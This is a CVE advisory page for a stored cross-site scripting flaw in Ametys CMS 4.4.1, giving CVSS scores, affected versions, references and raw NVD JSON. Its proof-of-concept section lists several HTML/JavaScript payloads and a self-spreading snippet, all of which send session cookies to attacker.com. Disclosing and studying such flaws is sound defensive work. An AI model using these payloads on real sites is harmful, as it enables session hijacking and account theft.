Security Vulnerability Report
CVE-2022-50937 CVSS 6.1 MEDIUM

Published: 2026-01-13 23:15:59
Last Modified: 2026-02-02 16:16:17

Description

Ametys CMS v4.4.1 contains a persistent cross-site scripting vulnerability in the link directory's input fields for external links. Attackers can inject malicious script code in link text and descriptions to execute persistent attacks that compromise user sessions and manipulate application modules.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ametys:ametys:4.4.1:*:*:*:*:*:*:* - VULNERABLE
Ametys CMS < 4.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2022-50937 PoC: Stored XSS in Ametys CMS Link Directory -->
<!-- Target: Ametys CMS v4.4.1 Link Directory External Links Input Fields -->

<!-- Step 1: Inject malicious script in link text field -->
<script>
// Malicious payload to steal session cookies
fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie))
</script>

<!-- Alternative payload using img onerror -->
<img src=x onerror="fetch('https://attacker.com/log?data='+btoa(document.cookie))">

<!-- Step 2: XSS payload in description field -->
<svg/onload=fetch('https://attacker.com/cookie?c='+document.cookie)>

<!-- Step 3: Self-propagating XSS worm payload -->
<script>
var payload = '<script>fetch("https://attacker.com/exfil?c="+document.cookie)<\/script>';
// Automatically inject into other links
document.querySelectorAll('.link-title, .link-description').forEach(function(el) {
  if(el.innerHTML.indexOf('CVE-2022-50937') > -1) {
    el.innerHTML += payload;
  }
});
</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50937", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:58.880", "lastModified": "2026-02-02T16:16:17.303", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ametys CMS v4.4.1 contains a persistent cross-site scripting vulnerability in the link directory's input fields for external links. Attackers can inject malicious script code in link text and descriptions to execute persistent attacks that compromise user sessions and manipulate application modules."}, {"lang": "es", "value": "Ametys CMS v4.4.1 contiene una vulnerabilidad de cross-site scripting persistente en los campos de entrada del directorio de enlaces para enlaces externos. Los atacantes pueden inyectar código de script malicioso en el texto y las descripciones de los enlaces para ejecutar ataques persistentes que comprometen las sesiones de usuario y manipulan los módulos de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ametys:ametys:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "A368AF26-84E1-487B-8B9D-F506C23327BB"}]}]}], "references": [{"url": "https://www.ametys.org/community/en/ametys-platform/ametys-portal/overview.html", "source": "[email protected]", "tags": ["Product"]}, {"url": 
"https://www.exploit-db.com/exploits/50692", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/ametys-cms-cross-site-scripting-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.vulnerability-lab.com/get_content.php?id=2275", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50692", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulnerability-lab.com/get_content.php?id=2275", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}